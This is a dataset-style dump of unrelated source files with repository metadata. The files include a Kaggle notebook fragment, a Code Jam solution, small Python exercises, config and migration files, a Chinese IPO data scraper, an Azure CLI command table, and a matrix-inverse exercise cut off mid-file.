# 1. Implementing a good cross-validation strategy in training the models to find optimal parameter values (see the sketch just after this list)
# 2. Introduce a greater variety of base models for learning. The more uncorrelated the results, the better the final score.
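# As a rough illustration of point 1 above, a grid search over the second-level XGBoost parameters might look like
# the commented-out sketch below; the parameter grid here is only an example, not a recommendation:
# from sklearn.model_selection import GridSearchCV
# param_grid = {'max_depth': [2, 4, 6], 'n_estimators': [200, 500, 1000]}
# search = GridSearchCV(xgb.XGBClassifier(objective='binary:logistic'),
#                       param_grid, scoring='accuracy', cv=5)
# search.fit(x_train, y_train)
# print(search.best_params_, search.best_score_)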
# ### Conclusion
#
# I hope this notebook has been somewhat helpful in introducing a working script for stacking learning models. Again, credit must be extended to Faron and Sina.
#
# For other excellent material on stacking or ensembling in general, refer to the de facto must-read article on the MLWave website: [Kaggle Ensembling Guide][1].
#
# Till next time, Peace Out
#
# [1]: http://mlwave.com/kaggle-ensembling-guide/
# In[ ]:
| [
"[email protected]"
]
| |
0f61974c5e834f3cba8ffe47ed15b4b1a1f3aba8 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_127/118.py | d4733f2f4831c105eb5335bfcd752027eea7d78a | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | import math
def get_number_of_test_case():
return int(raw_input().strip())
def ans(x, y, n):
if n == 1:
if abs(x) + abs(y) != 1:
return False
elif x == 1:
return 'E'
elif x == -1:
return 'W'
elif y == 1:
return 'N'
elif y == -1:
return 'S'
else:
threshold = (n * (n - 1) / 2)
for item in [[x + n, y, 'W',], [x - n, y, 'E',], [x, y + n, 'S',], [x, y - n, 'N',]]:
if abs(item[0]) + abs(item[1]) <= threshold:
result = ans(item[0], item[1], n - 1)
if result:
return result + item[2]
return False
def solve_case(t):
x, y = [int(i) for i in raw_input().strip().split()]
z = abs(x) + abs(y)
n = int(math.ceil((math.sqrt(z * 8 + 1) - 1) / 2))
found = False
result = ''
while not found:
result = ans(x, y, n)
if result:
found = True
n += 1
print 'Case #%d: %s' % (t, result,)
T = get_number_of_test_case()
t = 1
while t <= T:
solve_case(t)
t += 1
| [
"[email protected]"
]
| |
d6d823f39170c014d0a11739f5a3ab7b90f9178c | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4347/codes/1793_1595.py | 05495cd7b509876291eb94882aeab29cc3d2410f | []
| no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | from numpy import*
n=array(eval(input("nota dos alunos")))
h=0
t=0
while(size(n)>h):
t=t+n[h]
h=h+1
t=t-min(n)
y=size(n)
y=y-1
t=t/y
print(round(t,2))
| [
"[email protected]"
]
| |
ba8ea0976052895c62f71ec036fb295afc85a666 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_BoxCox/model_control_one_enabled_BoxCox_LinearTrend_Seasonal_Minute_AR.py | 8af17b88b486c656cac6b7a11b9ebc140c4f4ea5 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 161 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['BoxCox'] , ['LinearTrend'] , ['Seasonal_Minute'] , ['AR'] ); | [
"[email protected]"
]
| |
557c6f588642ff8207591f649b68e0f4d5928909 | dfc991b4163bca9192985bc6daa12168283ffac8 | /test/aqua/operators/__init__.py | 7909fc6dac6c123e255fc08303846d478c8de9e3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | Unathi-Skosana/qiskit-aqua | feb8231a1719a0e73aaae0f29df0246b3dc9419c | e13f66eda6d8b819a6f132319a2bac819941f6b1 | refs/heads/master | 2020-11-24T15:39:29.645914 | 2020-08-07T22:36:23 | 2020-08-07T22:36:23 | 255,790,533 | 2 | 0 | Apache-2.0 | 2020-04-15T03:06:06 | 2020-04-15T03:06:06 | null | UTF-8 | Python | false | false | 508 | py | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
| [
"[email protected]"
]
| |
72391153bf1b5a4b9500125fb9c2eab3123cfda6 | bd7e89c8e55a106af3dab4cf036309ec8a3e05e2 | /Onsite/Week1/stick_of_truth_1.py | c50e9491405a6de5ff35dd5cf1ee6b39d36a44b4 | []
| no_license | wiput1999/PrePro60-Python | 758ec60addaa61ff27ea9bc46474eaf244f5ab58 | d26dcadcd71896589f992a69cbff711ec0576f59 | refs/heads/master | 2021-09-15T19:52:10.899257 | 2018-06-09T12:52:42 | 2018-06-09T12:52:42 | 89,356,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | """ [Stick of Truth - 1] Time Converter """
def main():
""" Convert time """
# Parallel Hour
para_hr = int(input())
# Parallel Minute
para_min = int(input())
# Parallel Second
para_sec = int(input())
pre_result = (para_hr * 50 * 29) + (para_min * 29) + para_sec
pre_result *= 14
# Real World Second
real_sec = pre_result % 60
pre_result //= 60
# Real World Minute
real_min = pre_result % 60
pre_result //= 60
# Real World Hour
real_hr = pre_result % 24
pre_result //= 24
# Real World Day
real_day = pre_result
print("%02d:%02d:%02d" %(real_hr, real_min, real_sec))
print("Day : %d" %real_day)
main()
| [
"[email protected]"
]
| |
a4bb39a9334acf1bf77a42f83b0699981a29f9c7 | 781e2692049e87a4256320c76e82a19be257a05d | /assignments/python/anagram/src/374.py | c539bcd239aa7680c066a136c90fe90dc92c4ca3 | []
| no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 308 | py | def detect_anagrams(reference, word_list):
reference = reference.casefold()
ref_list = sorted(reference)
detect_anagram = lambda w1 : w1 != ref and sorted(w1) == ref_list
return [word
for word
in word_list
if detect_anagram(word.casefold())]
| [
"[email protected]"
]
| |
bc3fdf3b58a0e51964c0ff34acad6251cbc52f5f | 7a604a685f9729cd691a7c81f12f2f8a297744de | /feedly/default_settings.py | 2cacfbb53bcb1181a10700376b241fc1d96dd34f | [
"BSD-3-Clause"
]
| permissive | vmaliwal/Feedly | 16b3e6ba90646dcbce863f6a2b5613b832a21c0e | ec9c8655b4b831cda22d12afa7e39dc382a86b4e | refs/heads/master | 2021-01-20T22:55:09.042922 | 2013-08-08T13:39:34 | 2013-08-08T13:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py |
FEEDLY_NYDUS_CONFIG = {
'CONNECTIONS': {
'redis': {
'engine': 'nydus.db.backends.redis.Redis',
'router': 'nydus.db.routers.redis.PrefixPartitionRouter',
'hosts': {
0: {'prefix': 'default', 'db': 2, 'host': 'localhost', 'port': 6379},
12: {'prefix': 'feedly:', 'db': 0, 'host': 'localhost', 'port': 6379},
13: {'prefix': 'feedly:', 'db': 1, 'host': 'localhost', 'port': 6379},
14: {'prefix': 'notification:', 'db': 3, 'host': 'localhost', 'port': 6379},
}
},
}
}
FEEDLY_CASSANDRA_HOSTS = ['localhost']
| [
"[email protected]"
]
| |
b035543cf5b0996c159636f236d14a00d492ff0f | fcc33e6a8b8af0ac1d69bd9815b786318c4b2d4b | /tests/testapp/migrations/0002_config_template.py | 11ad23505a0fcdf0eab9bd30b3843fd68d91b43c | [
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | PabloCastellano/openwisp-users | 47a0c7b286422effaa57c192ee7a3e687afeb90f | d95cb7a1e30ef69b948216c54931ddf7a4a215fc | refs/heads/master | 2022-07-08T03:02:35.622736 | 2020-04-15T22:47:39 | 2020-04-15T22:47:39 | 256,520,208 | 0 | 0 | BSD-3-Clause | 2020-04-17T14:07:29 | 2020-04-17T14:07:28 | null | UTF-8 | Python | false | false | 510 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-14 15:14
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('testapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='config',
name='template',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='testapp.Template'),
),
]
| [
"[email protected]"
]
| |
47c521124fd2c1605e9cacaaffd327c383c76a12 | 8dfe4b53fae92795405d789d52148d1291836afa | /.metadata/.plugins/org.eclipse.core.resources/.history/b0/40309ba33381001515feb230dc0120b2 | fe95f4e3a0d5f62b004a6c2ef67cbc23ae59821a | []
| no_license | ymyjohnny/python | e07c54a88954e090cf3d30a4c6f6ac46353063fb | b483fd55e577d4dcceb5762bddf833df23874f3a | refs/heads/master | 2021-01-10T01:10:19.038424 | 2019-07-02T02:40:23 | 2019-07-02T02:40:23 | 45,223,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | #!/usr/bin/python
#coding=utf-8
'''
Created on 2015-11-2
@author: ymy
'''
import os
dirname = '/tmp'
def allfile(dirname):
for base,dirs,files in os.walk(dirname):
for file in files:
filename = os.path.join(base,file)
filenames = filename.append()
#print filenames
def grep_a(file,str):
pass
allfile(dirname) | [
"[email protected]"
]
| ||
966d55e40c38e5b665058075f090351806b1d9a6 | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/easy-money_20210129095952.py | ea98f703e481dd4caf491af6ddbe4c82c9af507b | []
| no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,945 | py | # 东方财富网 首发申报
from datetime import datetime,timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
import time
from bs4 import BeautifulSoup
base_url = 'https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx?'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def date_gen():
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text,'html.parser')
dateList = [i.text for i in soup.findAll('option')]
yield dateList
def get_eastmoneyData(dateList):
query = {'type': 'NS',
'sty' : 'NSFR',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '5000',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : '1',
'rt' : '53721774'
}
main_data = []
for date in dateList:
query['fd'] = dateList
# start = datetime.strptime('2017-01-05','%Y-%m-%d').date()
# while start < datetime.today().date():
# query['fd'] = start
url = base_url + urlencode(query)
# yield url
# start += timedelta(days=7)
rs = requests.get(url,headers=headers)
if rs.text == '':
continue
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
main_data.extend(data)
time.sleep(2)
temp = [i.split(',') for i in main_data]
columns = ['会计师事务所','保荐代表人','保荐机构','xxx','律师事务所','日期','所属行业','板块','是否提交财务自查报告',
'注册地','类型','机构名称','签字会计师','签字律师','时间戳','简称']
df = pd.DataFrame(temp,columns=columns)
df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
df = df[['机构名称', '类型', '板块', '注册地', '保荐机构','保荐代表人', '律师事务所', '签字律师','会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业','日期','xxx', '时间戳', '保荐机构','文件链接']]
df = df[df['板块'] != '创业板']
df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',index=False,encoding='utf-8-sig')
return df
def get_meetingData():
meetingInfo = []
    for marketType in ['2','4']: # 2 = Main Board (主板), 4 = SME Board (中小板)
query = {'type': 'NS',
'sty' : 'NSSH',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '5000',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : marketType,
'rt' : '53723990'
}
url = base_url + urlencode(query)
rss = requests.get(url,headers=headers)
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
meetingInfo.extend(data)
temp = [j.split(',') for j in meetingInfo]
columns = ['时间戳','yyy','公司代码','机构名称','详情链接','申报日期','上会日期','申购日期','上市日期','9','拟发行数量','发行前总股本','发行后总股本','13','占发行后总股本比例','当前状态','上市地点','主承销商','承销方式','发审委委员','网站','简称']
df = pd.DataFrame(temp,columns=columns)
df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
df['详情链接'] = df['公司代码'].apply(lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
df = df[['机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期','上会日期', '申购日期', '上市日期', '主承销商','承销方式', '9', '发行前总股本','发行后总股本','13','占发行后总股本比例','发审委委员','网站','公司代码','yyy','时间戳', '简称', '详情链接','文件链接']]
    df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_meeting.csv',index=False,encoding='utf-8-sig')
return df
def get_zzscData(dateList):
zzsc_dict = {}
for date in dateList:
query = {'type': 'NS',
'sty' : 'NSSE',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '500',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : '4',
'stat':'zzsc',
'fd' : date,
'rt' : '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url,headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
continue
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
time.sleep(2)
zzsc = pd.DataFrame(zzsc_dict.items(),columns = ['机构名称','决定终止审查时间'])
zzsc.to_csv('C:/Users/chen/Desktop/IPO_info/eastmoney_zzsc.csv',encoding='utf-8-sig',index=False)
return zzsc
def eastmoney_cleanUP():
east_money = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/easymoney_raw_data.csv')
east_money.replace({'是否提交财务自查报告':' '},'是')
east_money.replace({'是否提交财务自查报告':'不适用'},'是')
east_money['机构名称'] = east_money['机构名称'].replace(r'\*','',regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司','',regex=True)
east_money = east_money[east_money['板块'] != '创业板']
# east_money.sort_values(['机构名称','类型','受理日期'],ascending=[True, True,True],inplace=True)
# east_money.to_csv('C:/Users/chen/Desktop/IPO_info/pre_cleab.csv',encoding='utf-8-sig',index=False)
east_money.drop_duplicates(subset =['机构名称','类型'], keep = 'first', inplace = True)
east_money.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_cleaned.csv',encoding='utf-8-sig',index=False)
return east_money
def gen_finalData(cleaned_easymoney_df, meetingInfo_df, zzsc_df):
'''
主板、中小板 = {'机构名称':'',
'简称':'',
'Wind代码':'',
'统一社会信用代码':'',
'板块':'',
'注册地':'',
'所属行业':'',
'经营范围':'',
'预先披露':'[日期]',
'已反馈':'[日期]',
'预先披露更新':'[日期]',
'发审会':{'中止审查':'[日期]',
'已上发审会,暂缓表决':'[日期]',
'已提交发审会讨论,暂缓表决:'[日期]',
'已通过发审会':'[日期]'},
'终止审查':'[日期]',
'上市日期':'[日期]',
'保荐机构':'',
'律师事务所':,
'会计师事务所':'',
'发行信息':{'拟发行数量':'',
'发行前总股本':'',
'发行后总股本':''},
'反馈文件':'[链接]'
}
'''
    shzb = {} # Shanghai Main Board (上海主板)
    szzxb = {} # Shenzhen SME Board (深圳中小板)
    all_data = {} # all data (总数据)
ekk = cleaned_easymoney_df.values.tolist()
for i in ekk:
if i[0] not in all_data:
all_data[i[0]] = {'机构名称':i[0],
'简称':i[15],
'Wind代码':'',
'统一社会信用代码':'',
'板块':'',
'注册地':'',
'所属行业':'',
'经营范围':'',
'预先披露':'',
'已反馈':'',
'预先披露更新':'',
'发审会':{'中止审查':'',
'已上发审会,暂缓表决':'',
'已提交发审会讨论,暂缓表决':'',
'已通过发审会':''},
'终止审查':'',
'上市日期':'',
'保荐机构':i[4],
'律师事务所':i[6],
'会计师事务所':i[8],
'发行信息':{'拟发行数量':'',
'发行前总股本':'',
'发行后总股本':''},
'反馈文件':''
}
if i[1] == '已受理':
all_data[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
all_data[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
all_data[i[0]]['预先披露更新'] = i[12]
elif i[1] == '已通过发审会':
all_data[i[0]]['发审会']['已通过发审会'] = i[12]
elif i[1] == '已提交发审会讨论,暂缓表决':
all_data[i[0]]['发审会']['已通过发审会'] = i[12]
elif i[1] in ['已提交发审会讨论,暂缓表决','已上发审会,暂缓表决','中止审查']:
all_data[i[0]]['其他'] = {i[1]:i[12]} | [
"[email protected]"
]
| |
aa237d039e97b9f01880f9bee5d1a2994a3a66ea | 94318d8fa492445adb79547da369f141d8a80133 | /scripts/plot_detection_rate.py | 80df4af4d2dc49e02ca82f87f4f91f7f365b7f49 | []
| no_license | dragontt/geneoscopy_dev | 630fbaca230dfd009667694ed8bb4a222e597eed | a5cf26ed0dc949c3d7af48d765864aff95edbe9d | refs/heads/master | 2021-01-12T12:53:16.696478 | 2017-05-26T18:44:45 | 2017-05-26T18:44:45 | 69,477,315 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,061 | py | #/usr/bin/python
import numpy as np
import sys
import matplotlib.pyplot as plt
##Color choice:
#507cb2 <- blue
#73aa53 <- green
#7f4d91 <- purple
filename = sys.argv[1]
color = sys.argv[2]
f = open(filename, 'r')
lines = f.readlines()
f.close()
labels = []
values = []
for i in range(1, (len(lines)-1)):
line = lines[i].strip().split('\t')
labels.append(line[0])
values.append(float(line[2].strip('%')))
indx = np.arange(len(labels)) + .1
fig, ax = plt.subplots(figsize=(4, 2.5), dpi=150)
plt.bar(indx, values, .5, color='#'+color)
plt.ylabel('Sensitivity (%)')
plt.xticks(indx+.25, labels, rotation=40)
plt.tick_params(axis=u'x', which=u'both',length=0)
plt.ylim([0, 100])
plt.gcf().subplots_adjust(bottom=0.35, left=.2)
# plt.show()
rects = ax.patches
for rect, value in zip(rects, values):
height = rect.get_height()
annot_text = ax.text(rect.get_x() + rect.get_width()/2, height - 12, ('%d%%' % value),
ha='center', va='bottom', color='white')
annot_text.set_fontsize(9)
plt.savefig(filename.strip('.txt')+'.pdf', fmt='pdf')
| [
"[email protected]"
]
| |
965f0f0575173c3e422ccf531b6ee00c9c26153a | 18f0ad99e21e2e35126f8c3c28079d358fa2129a | /Adafruit_STEMMA_Relay/code.py | 90a3ebc494b98b85606ab958b6d7eed82af95a86 | [
"MIT"
]
| permissive | ladyada/Adafruit_Learning_System_Guides | 9bf18dfa35941e0cbecbb3c2d02b4fa3cb79744f | 6d76801878cbf65132ccea950dc47ae842c73dcd | refs/heads/master | 2023-08-20T20:30:42.910576 | 2022-01-10T20:28:11 | 2022-01-10T20:28:11 | 115,837,894 | 13 | 2 | MIT | 2020-03-31T23:23:45 | 2017-12-31T02:34:47 | C | UTF-8 | Python | false | false | 225 | py | import time
import board
import digitalio
relay = digitalio.DigitalInOut(board.A1)
relay.direction = digitalio.Direction.OUTPUT
while True:
relay.value = True
time.sleep(1)
relay.value = False
time.sleep(1)
| [
"[email protected]"
]
| |
74f58ecbee8a351e9afa5d6b12189026de789cce | 03e3138f99f275d15d41a5c5bfb212f85d64d02e | /source/res/scripts/client/gui/Scaleform/daapi/view/meta/BCMessageWindowMeta.py | 0012af4c374027efc9feaad96ad7d03c1dfb6253 | []
| no_license | TrenSeP/WorldOfTanks-Decompiled | e428728e7901146d0b599d02c930d70532232a97 | 1faa748acec1b7e435b657fd054ecba23dd72778 | refs/heads/1.4.1 | 2020-04-27T08:07:49.813023 | 2019-03-05T17:37:06 | 2019-03-05T17:37:06 | 174,159,837 | 1 | 0 | null | 2019-03-06T14:33:33 | 2019-03-06T14:24:36 | Python | UTF-8 | Python | false | false | 757 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/BCMessageWindowMeta.py
from tutorial.gui.Scaleform.pop_ups import TutorialDialog
class BCMessageWindowMeta(TutorialDialog):
def onMessageRemoved(self):
self._printOverrideError('onMessageRemoved')
def onMessageAppear(self, rendrerer):
self._printOverrideError('onMessageAppear')
def onMessageDisappear(self, rendrerer):
self._printOverrideError('onMessageDisappear')
def onMessageButtonClicked(self):
self._printOverrideError('onMessageButtonClicked')
def as_setMessageDataS(self, value):
return self.flashObject.as_setMessageData(value) if self._isDAAPIInited() else None
| [
"[email protected]"
]
| |
cbf6d2082e39aa257ea9fbe33b054caa5d9f3c3b | 7c74ceb9f8addcc0816d012e0b84b174b96e0def | /src/azure-cli/azure/cli/command_modules/aro/commands.py | d260980c3351e0d1f012b5f449a5127298355e87 | [
"MIT",
"LGPL-2.1-only",
"LGPL-2.1-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.0-or-later",
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause"
]
| permissive | microsoft/azure-cli | 4c826290e7a6f6bd27da3829b05e4f02ff6dc8d9 | 9ba64b33f6f78e2c3e42f8a147f59484300e8779 | refs/heads/dev | 2023-08-31T08:51:39.526556 | 2022-11-28T19:08:23 | 2022-11-28T19:08:23 | 370,900,439 | 7 | 7 | MIT | 2023-08-01T23:34:50 | 2021-05-26T03:59:41 | Python | UTF-8 | Python | false | false | 1,505 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands import CliCommandType
from azure.cli.command_modules.aro._client_factory import cf_aro
from azure.cli.command_modules.aro._format import aro_show_table_format
from azure.cli.command_modules.aro._format import aro_list_table_format
from azure.cli.command_modules.aro._help import helps # pylint: disable=unused-import
def load_command_table(self, _):
aro_sdk = CliCommandType(
operations_tmpl='azure.mgmt.redhatopenshift.operations#OpenShiftClustersOperations.{}', # pylint: disable=line-too-long
client_factory=cf_aro)
with self.command_group('aro', aro_sdk, client_factory=cf_aro) as g:
g.custom_command('create', 'aro_create', supports_no_wait=True)
g.custom_command('delete', 'aro_delete', supports_no_wait=True, confirmation=True)
g.custom_command('list', 'aro_list', table_transformer=aro_list_table_format)
g.custom_show_command('show', 'aro_show', table_transformer=aro_show_table_format)
g.custom_command('update', 'aro_update', supports_no_wait=True)
g.wait_command('wait')
g.custom_command('list-credentials', 'aro_list_credentials')
| [
"[email protected]"
]
| |
abb7a8d52d3b436acb78715b3bb73aea337c4351 | cc4d8bfef5395c0e3076e9a37a40864554e9099a | /cli.py | 6d64d4987ace1d007791275ed73818dfd6440490 | [
"MIT"
]
| permissive | NiklasRosenstein/yassg | 99ce9cd327d7e4a72b94066a6e1d1c693b581b33 | 511ca5a1eb76b8fb314c45de6ac85a845b98243c | refs/heads/master | 2021-01-01T04:49:03.758342 | 2017-11-15T13:02:52 | 2017-11-15T13:02:52 | 97,255,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | # Copyright (c) 2017 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import click
import toml
import os
import subprocess
import yassg from './yassg.py'
@click.command()
@click.argument('build_dir', default='build')
@click.option('-C', '--config', default=None,
help='Configuration file. Defaults to yassg.toml or .config/yassg.toml')
@click.option('--commit', is_flag=True,
help='Create a new commit after the build. Use only when the build '
'directory is set-up as a git worktree.')
@click.option('--push', is_flag=True,
help='Commit and push after the build. Use only when the build '
'directory is set-up as a git worktree.')
def main(build_dir, config, commit, push):
"""
Yet another static site generator.
"""
if not config:
config = 'yassg.toml'
if not os.path.isfile(config):
config = '.config/yassg.toml'
config_filename = config
with open(config) as fp:
config = toml.load(fp)
if 'content-directory' in config:
content_dir = os.path.join(os.path.dirname(config_filename), config['content-directory'])
else:
content_dir = 'content'
root = yassg.RootPage(yassg.pages_from_directory(content_dir, recursive=True))
root.sort()
renderer = yassg.Renderer(root, config)
renderer.render(build_dir)
if commit or push:
print('Creating new commit in "{}" ...'.format(build_dir))
subprocess.call(['git', 'add', '.'], cwd=build_dir)
subprocess.call(['git', 'commit', '-m', 'Update'], cwd=build_dir)
if push:
print('Pushing to "{}" ...'.format(build_dir))
subprocess.call(['git', 'push', 'origin', 'gh-pages'], cwd=build_dir)
if require.main == module:
main()
| [
"[email protected]"
]
| |
708ac5d15ba5bd4ff5de1105d484cf04d937744f | 70922de165319283d640821fd42ea1806da402c0 | /math/0x05-advanced_linear_algebra/4-inverse.py | 072f6b067b57f8f8f4c3b6c36868f390e22e15db | []
| no_license | ikki2530/holbertonschool-machine_learning | bdd8152d575a99281e2cce105cf87442ec07f2fb | 0b56aa0e92d65d4a5832cc994769834fbcfbe0ac | refs/heads/main | 2023-07-07T00:49:03.675328 | 2021-08-11T10:27:56 | 2021-08-11T10:27:56 | 317,352,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,506 | py | #!/usr/bin/env python3
"""
calculates the inverse of a matrix.
"""
def determinant(matrix):
"""
Calculates the determinant of a matrix.
- matrix is a list of lists whose determinant should be calculated.
Returns: the determinant of matrix
"""
n = len(matrix)
if n == 1 and len(matrix[0]) == 0 and type(
matrix) == list and type(matrix[0]) == list:
return 1
if n == 0:
raise TypeError("matrix must be a list of lists")
if type(matrix) != list:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) != list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a square matrix")
if len(matrix) == 1 and len(matrix[0]) == 1:
return matrix[0][0]
if n == 2:
a = matrix[0][0]
b = matrix[0][1]
c = matrix[1][0]
d = matrix[1][1]
det = a * d - (b * c)
return det
all_minors = []
mult = matrix[0]
signo = 1
signos = []
newm = []
temp = []
cofactorv = 0
# take the minors
for k in range(n):
for i in range(n):
for j in range(n):
if i != cofactorv and j != k:
temp.append(matrix[i][j])
if temp:
newm.append(temp.copy())
temp = []
if newm:
all_minors.append(newm)
signos.append(signo)
signo = signo * -1
newm = []
# add determinant
suma = 0
for i in range(n):
suma = suma + (signos[i] * mult[i] * determinant(all_minors[i]))
return suma
def minor(matrix):
"""
Calculates the minor matrix of a matrix.
- matrix is a list of lists whose minor matrix should be calculated.
Returns: the minor matrix of matrix
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1]]
newm = []
temp = []
minors = [[0 for j in range(n)] for i in range(n)]
# find the minor matrices
for h in range(n):
for w in range(n):
for i in range(n):
for j in range(n):
if i != h and j != w:
temp.append(matrix[i][j])
if temp:
newm.append(temp.copy())
temp = []
if newm:
# Add a new minor
minors[h][w] = determinant(newm)
newm = []
return minors
def cofactor(matrix):
"""
Calculates the cofactor matrix of a matrix.
